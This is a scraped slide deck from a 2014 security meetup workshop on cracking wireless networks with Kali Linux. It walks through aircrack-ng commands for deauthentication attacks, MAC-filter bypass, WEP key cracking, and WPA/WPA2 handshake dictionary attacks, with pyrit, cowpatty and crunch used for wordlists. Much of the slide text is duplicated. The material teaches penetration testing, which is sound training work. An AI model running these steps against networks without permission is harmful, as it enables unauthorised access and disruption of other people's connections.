Wireless Cracking using Kali
12,546 views
21 slides
Apr 11, 2014
Slide 1 of 21
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
About This Presentation
null Bangalore Chapter - March 2014 Wireless Humla
Slide Content
Wireless Cracking Using Kali
Asish Agarwalla
Asish Agarwalla
Terminology
•SSID (Service Set Identifier)
–An SSID is the Name of a Network
• BSSID (Basic Service Set Identifier)
– MAC address of the access point(AP)
• Wireless Client
•SSID (Service Set Identifier)
–An SSID is the Name of a Network
• BSSID (Basic Service Set Identifier)
– MAC address of the access point(AP)
• Wireless Client
Monitor Mode
•Monitor mode allows to monitor all traffic
received from the wireless network without
having associate with an access point or ad
hoc network.
• Create a monitor mode interface
–airmon-ng start <wlan interface>
– Ex: airmon-ng start wlan0
•Monitor mode allows to monitor all traffic
received from the wireless network without
having associate with an access point or ad
hoc network.
• Create a monitor mode interface
–airmon-ng start <wlan interface>
– Ex: airmon-ng start wlan0
Hidden SSID
• Passive Mode
– Use Wireshark/airodump and wait for any client to
connect to AP
• airodump-ng --channel <channel> --bssid xx.xx.xx.xx.xx.xx
<monitor interface>
• Active Mode
– Sending de-authentication packets using aireplay and
Use Wireshark/airodump to monitor the traffic.
– aireplay-ng –deauth 0 –a <bssid> <monitor mode
interface>
Probe Request and Probe Response packets will contains
the SSID of the network.
• Passive Mode
– Use Wireshark/airodump and wait for any client to
connect to AP
• airodump-ng --channel <channel> --bssid xx.xx.xx.xx.xx.xx
<monitor interface>
• Active Mode
– Sending de-authentication packets using aireplay and
Use Wireshark/airodump to monitor the traffic.
– aireplay-ng –deauth 0 –a <bssid> <monitor mode
interface>
Probe Request and Probe Response packets will contains
the SSID of the network.
Mac Filtering Bypass
• Passive Mode
–Use Wireshark/airodump and wait for any client to connect to AP
–airodump-ng –channel <channel> --bssid xx.xx.xx.xx.xx.xx <monitor
interface>
•Active Mode
– Force all connected client to authenticate again by sending de-
authentication packets using aireplay and use Wireshark/ airodump
to monitor the traffic
– aireplay-ng –deauth 0 –a <bssid> <monitor mode interface>
Once we find a whitelisted client's MAC address, we can spoof the MAC
address of the client using the macchanger utility .
• Passive Mode
–Use Wireshark/airodump and wait for any client to connect to AP
–airodump-ng –channel <channel> --bssid xx.xx.xx.xx.xx.xx <monitor
interface>
•Active Mode
– Force all connected client to authenticate again by sending de-
authentication packets using aireplay and use Wireshark/ airodump
to monitor the traffic
– aireplay-ng –deauth 0 –a <bssid> <monitor mode interface>
Once we find a whitelisted client's MAC address, we can spoof the MAC
address of the client using the macchanger utility .
WEP (Wired Equivalent Privacy)
Wireless Security
•Two types of WEP authentication
–Open System Authentication
–Shared Key Authentication
•Encrypt all network packages using
–a stream-cipher (RC4) for confidentiality
–a checksum (CRC-32) for integrity know as ICV
• 64 Bit key = 24Bit IV + 40 Bit Key
•128 Bit Key = 24Bit IV + 104 Bit Key
Wireless Security
•Two types of WEP authentication
–Open System Authentication
–Shared Key Authentication
•Encrypt all network packages using
–a stream-cipher (RC4) for confidentiality
–a checksum (CRC-32) for integrity know as ICV
• 64 Bit key = 24Bit IV + 40 Bit Key
•128 Bit Key = 24Bit IV + 104 Bit Key
WEP Encryption
IV(24 Bit) Secret Key(40Bits) +
RC4 Algorithm Data ICV
Cipher Text ICV
IV(24 Bit) Secret Key(40Bits) +
RC4 Algorithm Data ICV
Cipher Text ICV
WEP Weakness
•IV only 24-bits in WEP, IV must repeat
after 2^24 or ~ 16.7M packets
•IV sent in clear text
•CRC-32 is not cryptographically secure to
authenticate the message
•IV only 24-bits in WEP, IV must repeat
after 2^24 or ~ 16.7M packets
•IV sent in clear text
•CRC-32 is not cryptographically secure to
authenticate the message
WEP Cracking
1.Start Monitor Mode: airmon-ng start wlan0
2.Identify the target BSSID, SSID, Channel using airodump-ng:
airodump-ng mon0
3.Configured monitor interface to listen on target channel:
iwconfig mon0 channel <no>
4.Capture the packer using airodump:
airodump-ng --bssid <BSSID> --channel <no> -w <filename> mon0
5.Broadcast deauth packets: aireplay-ng -0 0 -a <BSSID> mon0
1.Start Monitor Mode: airmon-ng start wlan0
2.Identify the target BSSID, SSID, Channel using airodump-ng:
airodump-ng mon0
3.Configured monitor interface to listen on target channel:
iwconfig mon0 channel <no>
4.Capture the packer using airodump:
airodump-ng --bssid <BSSID> --channel <no> -w <filename> mon0
5.Broadcast deauth packets: aireplay-ng -0 0 -a <BSSID> mon0
WEP Cracking
6.Send deauth packet to a specific client:
aireplay-ng -0 0 -a <BSSID> -c <mac of associated client > mon0
7.Fake authentication:
aireplay -1 0 -e ssid -a <bssid> -h <attacker machine /spoof mac
address> mon0
8.Generate data packets using Arp Replay:
aireplay -3 -b <bssid> -h <attacker machine/connected client mac
address> mon0
9.Crack : aircrack-ng <file.cap>
6.Send deauth packet to a specific client:
aireplay-ng -0 0 -a <BSSID> -c <mac of associated client > mon0
7.Fake authentication:
aireplay -1 0 -e ssid -a <bssid> -h <attacker machine /spoof mac
address> mon0
8.Generate data packets using Arp Replay:
aireplay -3 -b <bssid> -h <attacker machine/connected client mac
address> mon0
9.Crack : aircrack-ng <file.cap>
WEP Packet Decrypting
1. airdecap-ng -w <Shared Key> <captured_file.cap>
2. The decrypted files are stored in a file named captured_file-dec.cap
3. Open the captured_file-dec.cap using wireshark
1. airdecap-ng -w <Shared Key> <captured_file.cap>
2. The decrypted files are stored in a file named captured_file-dec.cap
3. Open the captured_file-dec.cap using wireshark
WPA/WPA2
•WPA uses TKIP encryption algorithm
• WPA2 mandatorily uses the AES-CCMP
algorithm for encryption
• WPA and WPA2 support PSK and EAP-based
authentication
• WPA/WPA2 PSK is vulnerable to a dictionary
attack
•WPA uses TKIP encryption algorithm
• WPA2 mandatorily uses the AES-CCMP
algorithm for encryption
• WPA and WPA2 support PSK and EAP-based
authentication
• WPA/WPA2 PSK is vulnerable to a dictionary
attack
WPA/WPA2 4 Ways Handshake
WPA/WPA2 4 Ways Handshake
•Both Client and AP Generate Pairwise Master Key (PMK )
•PMK is derived using the WPA/WPA2 PSK passphrase
supplied by the user, along with the SSID. The
combination of both of these are sent through the
Password Based Key Derivation Function (PBKDF2), which
outputs the 256-bit shared key.
•The AP sends a psuedo-randomly generated Anonce to
the device .
•The device generates its own psuedo-random Snonce.
•The device then uses these two nonces, the MAC address
of the AP, the MAC address of the device, and the PMK, to
create a key called the Pairwise Temporal Key (PTK) which
is 64 bytes, or 512 bits in length
•Both Client and AP Generate Pairwise Master Key (PMK )
•PMK is derived using the WPA/WPA2 PSK passphrase
supplied by the user, along with the SSID. The
combination of both of these are sent through the
Password Based Key Derivation Function (PBKDF2), which
outputs the 256-bit shared key.
•The AP sends a psuedo-randomly generated Anonce to
the device .
•The device generates its own psuedo-random Snonce.
•The device then uses these two nonces, the MAC address
of the AP, the MAC address of the device, and the PMK, to
create a key called the Pairwise Temporal Key (PTK) which
is 64 bytes, or 512 bits in length
WPA/WPA2 4 Ways Handshake
• The device sends his snonce and a MIC to AP
•Now AP will calculate the PTK using the same
5 parameter and compare its MIC(message
integrity code) with client sent MIC
• If both matches AP singed his anonce using
PTK and send it along with key installation
• The device sends his snonce and a MIC to AP
•Now AP will calculate the PTK using the same
5 parameter and compare its MIC(message
integrity code) with client sent MIC
• If both matches AP singed his anonce using
PTK and send it along with key installation
WPA/WPA2 Dictionary Attack
WPA/WPA2 Cracking
1.Start Monitor Mode: airmon-ng start mon0
2.Identify the target BSSID, SSID, Channel using airodump-ng:
airodump-ng mon0
3.Configured monitor interface to listen on target channel:
iwconfig mon0 channel <no>
4.Capture the packer using airodump:
airodump-ng --bssid <BSSID> --channel <no> -w <filename> mon0
5.Broadcast deauth packets: aireplay-ng -0 0 -a <BSSID> mon0
6. Crack : aircrack-ng -w <password file> <file.cap>
1.Start Monitor Mode: airmon-ng start mon0
2.Identify the target BSSID, SSID, Channel using airodump-ng:
airodump-ng mon0
3.Configured monitor interface to listen on target channel:
iwconfig mon0 channel <no>
4.Capture the packer using airodump:
airodump-ng --bssid <BSSID> --channel <no> -w <filename> mon0
5.Broadcast deauth packets: aireplay-ng -0 0 -a <BSSID> mon0
6. Crack : aircrack-ng -w <password file> <file.cap>
Speeding up WPA/WPA2 PSK cracking
with PMK
•Generate PMK : Genpmk –f <password file> -d
<output file> -s “SSID”
• cowpatty –d <pmkfile> -s “SSID” -r <captured
file>
• Crack pyrit: pyrit -r <captured file> -i <pmk
file> attack_cowpatty
with PMK
•Generate PMK : Genpmk –f <password file> -d
<output file> -s “SSID”
• cowpatty –d <pmkfile> -s “SSID” -r <captured
file>
• Crack pyrit: pyrit -r <captured file> -i <pmk
file> attack_cowpatty
Speeding up WPA/WPA2 PSK cracking
with PMK
• Import password to pyrit
–pyrit -i <password file> import_passwords
• Create a essid in pyrit
–pyrit -e <ssid> creat_essid
• Generate PMK
– pyrit batch
• Crack using PMK
– pyrit -r <captured file> attack_db
with PMK
• Import password to pyrit
–pyrit -i <password file> import_passwords
• Create a essid in pyrit
–pyrit -e <ssid> creat_essid
• Generate PMK
– pyrit batch
• Crack using PMK
– pyrit -r <captured file> attack_db
Password File
• crunch <min><max> <letter> -t <guess>
• Ex: crunch 10 10 1234567890 -t
98767@@@@@
• crunch <min><max> <letter> -t <guess>
• Ex: crunch 10 10 1234567890 -t
98767@@@@@
Tags
Categories
GeneralDownload
Download Slideshow Get the original presentation fileQuick Actions
Statistics
- Views 12,546
- Slides 21
- Favorites 9
- Age 4252 days
Related Slideshows
22
Pray For The Peace Of Jerusalem and You Will Prosper
RodolfoMoralesMarcuc
30 views
26
Don_t_Waste_Your_Life_God.....powerpoint
chalobrido8
32 views
31
VILLASUR_FACTORS_TO_CONSIDER_IN_PLATING_SALAD_10-13.pdf
JaiJai148317
30 views
14
Fertility awareness methods for women in the society
Isaiah47
29 views
35
Chapter 5 Arithmetic Functions Computer Organisation and Architecture
RitikSharma297999
26 views
5
syakira bhasa inggris (1) (1).pptx.......
ourcommunity56
28 views